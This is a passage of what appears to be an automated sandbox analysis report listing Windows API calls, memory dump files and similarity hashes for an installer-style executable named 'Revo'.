                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                              • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                                              • Instruction ID: cfc89692b4771faa31f3440cbcbb3328f2b21d62788620711c29387ee39994bc
                                                                                                                                              • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                                              • Instruction Fuzzy Hash: 94E0BFB2010109BEEF095F50EC0AD7F371DE708210F11452EF946D5051E6B5A9309674
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,00420DE6,0041E6F0,0040359E,0041E6F0,00420DE6,004266F0,00004000,?,00000000,004033C8,00000004), ref: 00406258
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                              • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                              • Instruction ID: 50ccb5e768420c5b79bdfebb9096a84dabe54a6ff5c0a4120d9a71b85527c923
                                                                                                                                              • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                              • Instruction Fuzzy Hash: FDE08C3221821AABCF10BE608C00EEB3B6CEB017A0F02447AFD56E3050D231E83097A8
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,004266F0,0041E6F0,0040361A,00008001,00008001,0040351E,004266F0,00004000,?,00000000,004033C8), ref: 00406229
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                              • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                              • Instruction ID: fbac330590941eb325162a4ee9bfa4b3c7313c609e27a1dd4f64d068a4d06545
                                                                                                                                              • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                              • Instruction Fuzzy Hash: 8FE08632110129ABCF106E549C00EEB375CEF05350F014876F951E3040D730E83187A5
                                                                                                                                              APIs
                                                                                                                                              • MessageBoxIndirectW.USER32(0040A3E0), ref: 00405D5D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: IndirectMessage
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1874166685-0
                                                                                                                                              • Opcode ID: e599ad68c8be2b87716b93389efebd5836f5a776e8aa86078d111b59df2cb3f7
                                                                                                                                              • Instruction ID: 054c65bb711e663e566a4fe45ca9fd0f36251d7a25d2d2c6c9ec5f98a3fa3aea
                                                                                                                                              • Opcode Fuzzy Hash: e599ad68c8be2b87716b93389efebd5836f5a776e8aa86078d111b59df2cb3f7
                                                                                                                                              • Instruction Fuzzy Hash: 3EF0F8316103048BC754CF58EAA872637E0E745700F10813FE881A23F0E7B84491CF4E
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,0040659D,?,?,?,?,Remove folder: ,?,00000000), ref: 00406533
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Open
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                              • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                              • Instruction ID: f918e5a98cb24a054262289ed7dc727aaea68e18f53d3a7cb50250e03803467c
                                                                                                                                              • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                              • Instruction Fuzzy Hash: 49D0127200020DBBDF119E90AD01FAB3B1DEB08750F014826FE06A4090D775D530A759
                                                                                                                                              APIs
                                                                                                                                              • SetDlgItemTextW.USER32(?,?,00000000), ref: 0040463B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemText
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3367045223-0
                                                                                                                                              • Opcode ID: 9f5f9317995870dd68fcf34551989b3f9c33a874f6e62bdf9e4bbf2fb329bfe5
                                                                                                                                              • Instruction ID: 40b0c8aab23b9b46c3ec191ca1ef6f3d1e6ea20de3ce9ad326d3c9787e78ebc3
                                                                                                                                              • Opcode Fuzzy Hash: 9f5f9317995870dd68fcf34551989b3f9c33a874f6e62bdf9e4bbf2fb329bfe5
                                                                                                                                              • Instruction Fuzzy Hash: 36C04C75548300BFE641A759CC42F1FB799EF94355F40C92EB15DA11D1C67588209A2A
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: 6e1b277ce2e60e4bca7100d33b085465e2d15658cc9e03b99e7eec8e5e984b4d
                                                                                                                                              • Instruction ID: af208d489c9886f4e313255891423178c9fbc2f2764a4643b28e90c636558d3c
                                                                                                                                              • Opcode Fuzzy Hash: 6e1b277ce2e60e4bca7100d33b085465e2d15658cc9e03b99e7eec8e5e984b4d
                                                                                                                                              • Instruction Fuzzy Hash: 56C04C716402007ADA119B509E49F0777A857D0750F154A79B641E50E0E7B5E450D61D
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: f17b044b61b457f087bfeb3d17745763a09fbd5f12d8a34ac9dd27775b8272a2
                                                                                                                                              • Instruction ID: 10eff6f21afbf1ef2b68fd6575b90ea2c3c46436311cc0867b5bb07e65eb3fbf
                                                                                                                                              • Opcode Fuzzy Hash: f17b044b61b457f087bfeb3d17745763a09fbd5f12d8a34ac9dd27775b8272a2
                                                                                                                                              • Instruction Fuzzy Hash: A1B012356C4600BBDE115B40DE49F467F62E7A4B01F008579F380640F0CBF200E0DB19
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                              • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                              • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                              • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                              • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,0040441A), ref: 0040464D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                              • Opcode ID: c073a5ec0840fd0a4d417e8cf15a40d0e4bc79272bf166bfe9221ef36532abb8
                                                                                                                                              • Instruction ID: f5342d9634f29a5dfc1e0db37023d9f0ac9e73469a68d8a9939ce4b2318c467f
                                                                                                                                              • Opcode Fuzzy Hash: c073a5ec0840fd0a4d417e8cf15a40d0e4bc79272bf166bfe9221ef36532abb8
                                                                                                                                              • Instruction Fuzzy Hash: 28A0017A484900ABCA06AB50EF1A80ABB62FBA5705B518879B285510348B725820FB19
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\), ref: 00405794
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                                                                                                • Part of subcall function 00406B41: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                                                                                                                • Part of subcall function 00406B41: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                                                                                                                • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2972824698-0
                                                                                                                                              • Opcode ID: 0ca44847665e9aed309d99185b61354d5aa0b5474cd0cc683bca3159d0948431
                                                                                                                                              • Instruction ID: 39264c5466c0a9c1499aa9251a9428ad8f628c8ba18ccf0a3388d06020594a91
                                                                                                                                              • Opcode Fuzzy Hash: 0ca44847665e9aed309d99185b61354d5aa0b5474cd0cc683bca3159d0948431
                                                                                                                                              • Instruction Fuzzy Hash: ABF0FC31904111DBEB20BBA55AC94AE7260CF00318F10413FE202B21D5CABC4D41A65E
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: f18e2d7214b30d3dc46271dbcb4a7f92884385a6914c4136972039e1db28dba1
                                                                                                                                              • Instruction ID: 59c12c35bbb872f0caeb150da19be0ad997f967f675472e8316fb546946162d5
                                                                                                                                              • Opcode Fuzzy Hash: f18e2d7214b30d3dc46271dbcb4a7f92884385a6914c4136972039e1db28dba1
                                                                                                                                              • Instruction Fuzzy Hash: DAD05E73A146008BD744EBB8BE8546F73A8EA50319320483BD142E10A1E6B88901461C
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004050A6
                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004050B1
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004050FB
                                                                                                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00405112
                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,0040569B), ref: 0040512B
                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040513F
                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405151
                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00405167
                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405173
                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405185
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00405188
                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004051B3
                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004051BF
                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040525A
                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040528A
                                                                                                                                                • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040529E
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004052CC
                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052DA
                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 004052EA
                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053E5
                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040544A
                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040545F
                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405483
                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004054A3
                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004054B8
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004054C8
                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405541
                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 004055EA
                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055F9
                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00405624
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00405672
                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 0040567D
                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405684
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
